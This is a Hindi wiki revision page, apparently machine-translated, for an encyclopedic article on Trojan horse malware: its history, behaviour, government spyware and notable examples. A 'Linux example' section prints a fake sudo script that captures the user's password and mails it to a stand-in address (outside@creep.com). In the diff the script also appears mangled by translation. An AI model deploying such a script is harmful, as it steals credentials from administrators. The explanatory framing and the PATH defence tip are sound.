ट्रोजन हॉर्स (कंप्यूटिंग): Difference between revisions

From Vigyanwiki
No edit summary
Line 21: Line 21:
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले [[यूनिक्स]] मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:<ref>{{cite web |last1=Thompson |first1=Ken | last2=Ritchie | first2=Dennis M. |title=यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971|url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |access-date=28 March 2020}}</ref>
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले [[यूनिक्स]] मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:<ref>{{cite web |last1=Thompson |first1=Ken | last2=Ritchie | first2=Dennis M. |title=यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971|url=https://www.bell-labs.com/usr/dmr/www/man21.pdf |access-date=28 March 2020}}</ref>


{{quotation |Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other’s files.}}
{{quotation |इसके अलावा, कोई भी सेट-यूज़र-आईडी बिट ऑन के साथ फ़ाइल के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य फ़ाइलों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।}}
एक और प्रारंभिक संदर्भ 1974 में [[मॉलटिक्स]] कंप्यूटर सिस्टम में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना की रिपोर्ट में है।<ref name="Multics">{{Citation|last1 = Karger| first1 = P.A.| last2 = Schell| first2 = R.R.| title = Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193| volume = II| journal  = HQ Electronic Systems Division: Hanscom AFB, MA| url = http://csrc.nist.gov/publications/history/karg74.pdf}}</ref>
एक और प्रारंभिक संदर्भ 1974 में [[मॉलटिक्स]] कंप्यूटर सिस्टम में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना की रिपोर्ट में है।<ref name="Multics">{{Citation|last1 = Karger| first1 = P.A.| last2 = Schell| first2 = R.R.| title = Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193| volume = II| journal  = HQ Electronic Systems Division: Hanscom AFB, MA| url = http://csrc.nist.gov/publications/history/karg74.pdf}}</ref>


Line 63: Line 63:
   | page = 42
   | page = 42
   | isbn = 0-8104-6267-2
   | isbn = 0-8104-6267-2
}}</ref> एक आसान प्रोग्राम Linux [[sudo]] कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है <code>/tmp ।</code>यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है <code>sudo</code>, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:
}}</ref> एक आसान प्रोग्राम Linux [[sudo]] कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है <code>/tmp ।</code>यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है <code>sudo</code>, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है,
 
:
<वाक्यविन्यास प्रकाश लैंग = श>
# sudo
:
# ----
# सुडो
# ----
# Turn off the character echo to the screen.
 
stty -echo
# कैरेक्टर इको को स्क्रीन पर बंद करें।
stty -गूंज
/bin/echo -n "Password for `whoami`: "
 
read x
/bin/echo -n `whoami` के लिए पासवर्ड:
/bin/echo ""
एक्स पढ़ें
/बिन/गूंज
# Turn back on the character echo.
 
stty echo
# कैरेक्टर इको को वापस चालू करें।
stty गूंज
echo $x | mail -s "`whoami` password" outside@creep.com
 
sleep 1
प्रतिध्वनि $x | mail -s `whoami` पासवर्ड @creep.com के बाहर
echo Sorry.
नींद 1
rm $0
गूंज क्षमा करें।
आरएम $ 0
exit 0
 
बाहर निकलें 0
</वाक्यविन्यास हाइलाइट>
 
[[कमांड लाइन]] आधारित ट्रोजन हॉर्स को रोकने के लिए, सेट करें <code>.</code> में प्रवेश <code>PATH=</code> पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: <code>PATH=/usr/local/bin:/usr/bin:.</code>.
[[कमांड लाइन]] आधारित ट्रोजन हॉर्स को रोकने के लिए, सेट करें <code>.</code> में प्रवेश <code>PATH=</code> पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: <code>PATH=/usr/local/bin:/usr/bin:.</code>.



Revision as of 16:48, 22 December 2022

कम्प्यूटिंग में, एक ट्रोजन हॉर्स कोई भी ऐसा मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक इरादे से भ्रमित करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ।[1][2][3][4][5] ट्रोजन आमतौर पर सोशल इंजीनियरिंग (सुरक्षा) के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक ईमेल अटैचमेंट निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप पिछले दरवाजे (कंप्यूटिंग) के रूप में कार्य करते हैं,

एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर तक अनधिकृत पहुंच प्राप्त कर सकते हैं।[6] रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।

कंप्यूटर वायरस और कंप्यूटर कीड़ा के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में नवीनता करने का प्रयास नहीं करते हैं या अन्यथा स्वयं को प्रचारित नहीं करते हैं।[7]


शब्द का प्रयोग

यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले यूनिक्स मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:[8]

इसके अलावा, कोई भी सेट-यूज़र-आईडी बिट ऑन के साथ फ़ाइल के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य फ़ाइलों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।

एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स कंप्यूटर सिस्टम में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना की रिपोर्ट में है।[9]

इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग अवार्ड स्वीकृति व्याख्यान "रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट" में लोकप्रिय बनाया गया था।[10] सबटाइटल: किसी को किस हद तक एक कथन पर भरोसा करना चाहिए कि एक प्रोग्राम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मल्टिक्स की सुरक्षा पर एक रिपोर्ट से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।[11][12]


व्यवहार

एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक कमांड और कंट्रोल (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रॉक्सी के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रोजन पर कब्जा कर सकते हैं।[13]

जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए स्पाइवेयर को कभी-कभी गोववेयर कहा जाता है । गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।[14][15] गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर [16] और जर्मन "स्टेट ट्रोजन" उपनाम R2D2 शामिल है। [14]जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।[17]

हैकर्स के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। BitDefender द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।[18] बिटडिफेंडर ने कहा है कि लगभग 15% कंप्यूटर एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमण द्वारा भर्ती किए जाते हैं।[19]


लिनक्स उदाहरण

ट्रोजन हॉर्स एक कंप्यूटर प्रोग्राम है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।[20] एक आसान प्रोग्राम Linux sudo कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है /tmp ।यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है sudo, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है,

:
# sudo
# ----

# Turn off the character echo to the screen.
stty -echo

/bin/echo -n "Password for `whoami`: "
read x
/bin/echo ""

# Turn back on the character echo.
stty echo

echo $x | mail -s "`whoami` password" outside@creep.com
sleep 1
echo Sorry.
rm $0

exit 0

कमांड लाइन आधारित ट्रोजन हॉर्स को रोकने के लिए, सेट करें . में प्रवेश PATH= पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: PATH=/usr/local/bin:/usr/bin:..

उल्लेखनीय उदाहरण

निजी और सरकारी

सार्वजनिक रूप से उपलब्ध

  • ईजीएबीटीआर - 1980 के दशक के अंत में
  • नेटबस - 1998 (प्रकाशित)[21]
  • मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
  • पीछे का छिद्र - 1998 (प्रकाशित)
  • बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
  • बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
  • डार्ककॉमेट - 2008-2012 (प्रकाशित)
  • ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
  • घोस्ट आरएटी - 2009 (प्रकाशित)
  • मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)[22][23]
  • Leurak द्वारा MEMZ - 2016 (प्रकाशित)

सुरक्षा शोधकर्ताओं द्वारा पता लगाया

  • बारह टोटके - 1990
  • क्लिकबॉट.ए - 2006 (खोजा गया)
  • ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
  • ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
  • ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
  • कोबफेस - 2008 (खोजा गया)
  • चोट - 2009 (खोजा गया)
  • कोरफ्लड - 2010 (खोजा गया)
  • टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
  • सोवा - 2022 (खोजा गया)[24]
  • गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)[25][26]Cite error: Closing </ref> missing for <ref> tag[27][28]


पूंजीकरण

कंप्यूटर शब्द ट्रोजन हॉर्स प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण ट्रोजन को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली मार्गदर्शिकाएँ और शब्दकोश भिन्न होते हैं, कई सामान्य उपयोग के लिए लोअर केस ट्रोजन का सुझाव देते हैं।[29][30]


यह भी देखें

संदर्भ

  1. Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved April 5, 2012.
  2. "ट्रोजन हॉर्स परिभाषा". Retrieved April 5, 2012.
  3. "ट्रोजन हॉर्स". Webopedia. Retrieved April 5, 2012.
  4. "ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा". Retrieved April 5, 2012.
  5. "ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।". Retrieved April 5, 2012.
  6. "वायरस, वर्म और ट्रोजन के बीच अंतर". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
  7. "वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  8. Thompson, Ken; Ritchie, Dennis M. "यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971" (PDF). Retrieved March 28, 2020.
  9. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
  10. Ken Thompson (1984). "ट्रस्टिंग ट्रस्ट पर प्रतिबिंब". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
  11. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  12. Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  13. Crapanzano, Jamie (2003). सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स (Report). SANS Institute. Retrieved May 10, 2021.
  14. 14.0 14.1 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  15. "अधिकतर पूछे जाने वाले सवाल". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  16. Dunn, John (August 27, 2009). "स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है". TechWorld. Archived from the original on January 26, 2014. Retrieved January 10, 2021.
  17. "जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है". DW. Retrieved April 14, 2018.
  18. "बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है". BitDefender. Archived from the original on August 8, 2009. Retrieved March 27, 2020.
  19. Datta, Ganesh (August 7, 2014). "ट्रोजन क्या होते हैं?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
  20. Wood, Patrick H.; Kochan, Stephen G. (1985). यूनिक्स प्रणाली सुरक्षा. Hayden Books. p. 42. ISBN 0-8104-6267-2.
  21. Seth, Kulakow (1998). "क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?" (Report). SANS Institute. Retrieved May 10, 2021.
  22. "मेगा पैंजर". SourceForge.
  23. "मिनी टैंक". SourceForge.
  24. "सोवा वायरस क्या है?". India Today.
  25. "ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग".
  26. Neal, Dave (November 20, 2015). "शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है". The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.{{cite web}}: CS1 maint: unfit URL (link)
  27. Times, Tech (November 9, 2015). "एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें".
  28. "एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें". November 19, 2015.
  29. "ट्रोजन". Collins Advanced Dictionary. Retrieved March 29, 2020.
  30. "ट्रोजन हॉर्स". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.


इस पेज में लापता आंतरिक लिंक की सूची

  • प्राचीन यूनानी
  • मिनीपैंजर और मेगापैंजर
  • विदेशी खुफिया सेवा (रूस)
  • एनोम
  • ेगाबत्र
  • घो0स्त चूहा
  • बिफ्रॉस्ट (ट्रोजन हॉर्स)
  • जानवर (ट्रोजन हॉर्स)
  • ज़ीउस (ट्रोजन हॉर्स)
  • जीरो एक्सेस बॉटनेट
  • शैली गाइड

बाहरी संबंध